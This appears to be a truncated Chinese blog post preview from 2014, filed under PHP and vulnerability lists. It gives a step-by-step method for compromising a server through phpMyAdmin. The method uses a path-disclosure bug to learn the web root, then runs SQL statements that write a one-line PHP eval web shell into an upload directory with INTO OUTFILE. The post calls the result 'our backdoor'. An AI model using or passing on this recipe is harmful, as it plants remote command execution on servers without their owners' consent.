• 首先用暴路径漏洞找到绝对路径,然后替换下面的路径 随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell) Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'D:\www\dmtz\bbs\upload\phpmyadmin\eval.php'; Drop TABLE IF EXISTS a; 这是我们的后门 http://xxx.com/ph...
    作者:熊猫| 发布:2014年2月21日| 阅读:4,495次| 分类:PHP, 漏洞列表, 编程语言| 标签:, ,